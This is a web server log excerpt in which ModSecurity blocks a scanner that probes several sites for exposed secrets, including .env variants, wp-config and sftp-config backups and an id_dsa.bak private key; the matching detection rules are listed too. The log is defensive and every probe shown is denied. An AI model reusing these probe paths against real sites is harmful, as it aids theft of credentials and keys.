[Mon May 11 11:28:57.293661 2026] [security2:error] [pid 1254133:tid 1254138] [client 185.177.72.9:5424] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/rails/wp-config.old.backup"] [unique_id "agGhWRjZymfuKpjWXeh0qwAAAMI"]
[Mon May 11 11:28:58.508896 2026] [security2:error] [pid 1254133:tid 1254138] [client 185.177.72.9:5424] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhWRjZymfuKpjWXeh0qwAAAMI"]
[Mon May 11 11:29:09.346802 2026] [security2:error] [pid 1254133:tid 1254144] [client 185.177.72.9:62334] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /railway/sftp-config.json_backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/railway/sftp-config.json_backup"] [unique_id "agGhZRjZymfuKpjWXeh0tAAAAMg"]
[Mon May 11 11:29:09.347172 2026] [security2:error] [pid 1254133:tid 1254144] [client 185.177.72.9:62334] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/railway/sftp-config.json_backup"] [unique_id "agGhZRjZymfuKpjWXeh0tAAAAMg"]
[Mon May 11 11:29:10.530312 2026] [security2:error] [pid 1254133:tid 1254144] [client 185.177.72.9:62334] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhZRjZymfuKpjWXeh0tAAAAMg"]
[Mon May 11 11:29:10.555038 2026] [security2:error] [pid 1256241:tid 1256258] [client 185.177.72.9:62336] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /railway/sftp-config.json_backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/railway/sftp-config.json_backup"] [unique_id "agGhZpkIEwRJMyDaV55GtAAAAUw"]
[Mon May 11 11:29:10.555465 2026] [security2:error] [pid 1256241:tid 1256258] [client 185.177.72.9:62336] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/railway/sftp-config.json_backup"] [unique_id "agGhZpkIEwRJMyDaV55GtAAAAUw"]
[Mon May 11 11:29:11.345538 2026] [ssl:error] [pid 1254133:tid 1254145] [client 66.132.172.206:63056] AH02032: Hostname totalcloud.fr (default host as no SNI was provided) and hostname rixonephotography.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Mon May 11 11:29:11.765725 2026] [security2:error] [pid 1256241:tid 1256258] [client 185.177.72.9:62336] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhZpkIEwRJMyDaV55GtAAAAUw"]
[Mon May 11 11:29:22.689137 2026] [security2:error] [pid 1254242:tid 1254246] [client 185.177.72.9:29922] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /register/.env.dev4"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/register/.env.dev4"] [unique_id "agGhcr4KNmD_mZ_vlf8xwwAAAEA"]
[Mon May 11 11:29:22.689359 2026] [security2:error] [pid 1254242:tid 1254246] [client 185.177.72.9:29922] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/register/.env.dev4"] [unique_id "agGhcr4KNmD_mZ_vlf8xwwAAAEA"]
[Mon May 11 11:29:23.867939 2026] [security2:error] [pid 1254242:tid 1254246] [client 185.177.72.9:29922] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhcr4KNmD_mZ_vlf8xwwAAAEA"]
[Mon May 11 11:29:23.893253 2026] [security2:error] [pid 1256241:tid 1256270] [client 185.177.72.9:3116] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /register/.env.dev4"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/register/.env.dev4"] [unique_id "agGhc5kIEwRJMyDaV55GxgAAAVg"]
[Mon May 11 11:29:23.893463 2026] [security2:error] [pid 1256241:tid 1256270] [client 185.177.72.9:3116] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/register/.env.dev4"] [unique_id "agGhc5kIEwRJMyDaV55GxgAAAVg"]
[Mon May 11 11:29:25.109053 2026] [security2:error] [pid 1256241:tid 1256270] [client 185.177.72.9:3116] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhc5kIEwRJMyDaV55GxgAAAVg"]
[Mon May 11 11:29:25.132838 2026] [security2:error] [pid 1254242:tid 1254253] [client 185.177.72.9:3124] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /register/.env.example.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/register/.env.example.example"] [unique_id "agGhdb4KNmD_mZ_vlf8xxQAAAEg"]
[Mon May 11 11:29:25.133378 2026] [security2:error] [pid 1254242:tid 1254253] [client 185.177.72.9:3124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/register/.env.example.example"] [unique_id "agGhdb4KNmD_mZ_vlf8xxQAAAEg"]
[Mon May 11 11:29:26.349810 2026] [security2:error] [pid 1254242:tid 1254253] [client 185.177.72.9:3124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhdb4KNmD_mZ_vlf8xxQAAAEg"]
[Mon May 11 11:29:26.374190 2026] [security2:error] [pid 1256241:tid 1256266] [client 185.177.72.9:3138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /register/.env.example.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/register/.env.example.example"] [unique_id "agGhdpkIEwRJMyDaV55GyAAAAVQ"]
[Mon May 11 11:29:26.374388 2026] [security2:error] [pid 1256241:tid 1256266] [client 185.177.72.9:3138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/register/.env.example.example"] [unique_id "agGhdpkIEwRJMyDaV55GyAAAAVQ"]
[Mon May 11 11:29:27.603732 2026] [security2:error] [pid 1256241:tid 1256266] [client 185.177.72.9:3138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhdpkIEwRJMyDaV55GyAAAAVQ"]
[Mon May 11 11:29:27.631084 2026] [security2:error] [pid 1254179:tid 1254189] [client 185.177.72.9:3150] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /register/.env.old.tmp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/register/.env.old.tmp"] [unique_id "agGhd2S6k_SCYd1AVZqnlQAAAQg"]
[Mon May 11 11:29:27.631307 2026] [security2:error] [pid 1254179:tid 1254189] [client 185.177.72.9:3150] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/register/.env.old.tmp"] [unique_id "agGhd2S6k_SCYd1AVZqnlQAAAQg"]
[Mon May 11 11:29:28.797985 2026] [security2:error] [pid 1254179:tid 1254189] [client 185.177.72.9:3150] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhd2S6k_SCYd1AVZqnlQAAAQg"]
[Mon May 11 11:29:28.823877 2026] [security2:error] [pid 1254242:tid 1254258] [client 185.177.72.9:3164] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /register/.env.old.tmp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/register/.env.old.tmp"] [unique_id "agGheL4KNmD_mZ_vlf8xyAAAAE0"]
[Mon May 11 11:29:28.824354 2026] [security2:error] [pid 1254242:tid 1254258] [client 185.177.72.9:3164] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/register/.env.old.tmp"] [unique_id "agGheL4KNmD_mZ_vlf8xyAAAAE0"]
[Mon May 11 11:29:29.906181 2026] [security2:error] [pid 1256241:tid 1256259] [client 43.153.85.46:55190] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/"] [unique_id "agGheZkIEwRJMyDaV55GygAAAU0"], referer: http://krakoukas.com
[Mon May 11 11:29:30.164465 2026] [security2:error] [pid 1254242:tid 1254258] [client 185.177.72.9:3164] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGheL4KNmD_mZ_vlf8xyAAAAE0"]
[Mon May 11 11:29:35.091681 2026] [security2:error] [pid 1254133:tid 1254145] [client 185.177.72.9:14386] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "jeanboyault.fr"] [uri "/register/id_dsa.bak"] [unique_id "agGhfxjZymfuKpjWXeh0zwAAAMk"]
[Mon May 11 11:29:35.092115 2026] [security2:error] [pid 1254133:tid 1254145] [client 185.177.72.9:14386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/register/id_dsa.bak"] [unique_id "agGhfxjZymfuKpjWXeh0zwAAAMk"]
[Mon May 11 11:29:36.271580 2026] [security2:error] [pid 1254133:tid 1254145] [client 185.177.72.9:14386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhfxjZymfuKpjWXeh0zwAAAMk"]
[Mon May 11 11:29:36.298344 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:14392] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.jeanboyault.fr"] [uri "/register/id_dsa.bak"] [unique_id "agGhgL4KNmD_mZ_vlf8xzAAAAEY"]
[Mon May 11 11:29:36.298779 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:14392] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/register/id_dsa.bak"] [unique_id "agGhgL4KNmD_mZ_vlf8xzAAAAEY"]
[Mon May 11 11:29:37.545127 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:14392] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhgL4KNmD_mZ_vlf8xzAAAAEY"]
[Mon May 11 11:29:45.357579 2026] [security2:error] [pid 1254133:tid 1254147] [client 185.177.72.9:20838] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /render/.env.copy"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/render/.env.copy"] [unique_id "agGhiRjZymfuKpjWXeh01gAAAMs"]
[Mon May 11 11:29:45.357799 2026] [security2:error] [pid 1254133:tid 1254147] [client 185.177.72.9:20838] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/render/.env.copy"] [unique_id "agGhiRjZymfuKpjWXeh01gAAAMs"]
[Mon May 11 11:29:46.780910 2026] [security2:error] [pid 1254133:tid 1254147] [client 185.177.72.9:20838] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhiRjZymfuKpjWXeh01gAAAMs"]
[Mon May 11 11:29:46.806551 2026] [security2:error] [pid 1256241:tid 1256267] [client 185.177.72.9:20846] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /render/.env.copy"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/render/.env.copy"] [unique_id "agGhipkIEwRJMyDaV55G2gAAAVU"]
